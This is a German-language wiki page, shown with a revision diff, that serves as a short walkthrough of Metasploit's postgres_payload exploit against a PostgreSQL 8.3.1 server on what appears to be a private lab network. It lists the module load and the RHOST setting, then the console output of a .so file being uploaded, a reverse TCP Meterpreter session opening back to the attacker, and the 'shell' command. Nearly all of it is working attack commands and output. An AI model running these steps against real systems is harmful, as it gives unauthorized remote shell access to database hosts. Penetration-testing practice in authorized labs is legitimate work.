Metasploit postgres payload: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| (Eine dazwischenliegende Version desselben Benutzers wird nicht angezeigt) | |||
| Zeile 6: | Zeile 6: | ||
=Erfolgreicher Exploit= | =Erfolgreicher Exploit= | ||
*exploit | *exploit | ||
| − | [*] Started reverse TCP handler on 10.0.10.101:4444 | + | [*] Started reverse TCP handler on 10.0.10.101:4444 |
| − | [*] 10.0.10.105:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4) | + | [*] 10.0.10.105:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4) |
| − | [*] Uploaded as /tmp/OetBcDLo.so, should be cleaned up automatically | + | [*] Uploaded as /tmp/OetBcDLo.so, should be cleaned up automatically |
| − | [*] Sending stage (984904 bytes) to 10.0.10.105 | + | [*] Sending stage (984904 bytes) to 10.0.10.105 |
| − | [*] Meterpreter session 2 opened (10.0.10.101:4444 -> 10.0.10.105:40172) at 2021-06-25 06:33:53 +0200 | + | [*] Meterpreter session 2 opened (10.0.10.101:4444 -> 10.0.10.105:40172) at 2021-06-25 06:33:53 +0200 |
| − | meterpreter > | + | *meterpreter > |
| + | =Wenn man eine shell will= | ||
| + | *meterpreter > shell | ||
Aktuelle Version vom 1. Juli 2021, 07:44 Uhr
Exploit laden
- use exploit/linux/postgres/postgres_payload
- Wenn schon eingestellt sollte reverse_tcp automatisch geladen werden
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
- set RHOST 10.0.10.105
Erfolgreicher Exploit
- exploit
[*] Started reverse TCP handler on 10.0.10.101:4444 [*] 10.0.10.105:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4) [*] Uploaded as /tmp/OetBcDLo.so, should be cleaned up automatically [*] Sending stage (984904 bytes) to 10.0.10.105 [*] Meterpreter session 2 opened (10.0.10.101:4444 -> 10.0.10.105:40172) at 2021-06-25 06:33:53 +0200
- meterpreter >
Wenn man eine shell will
- meterpreter > shell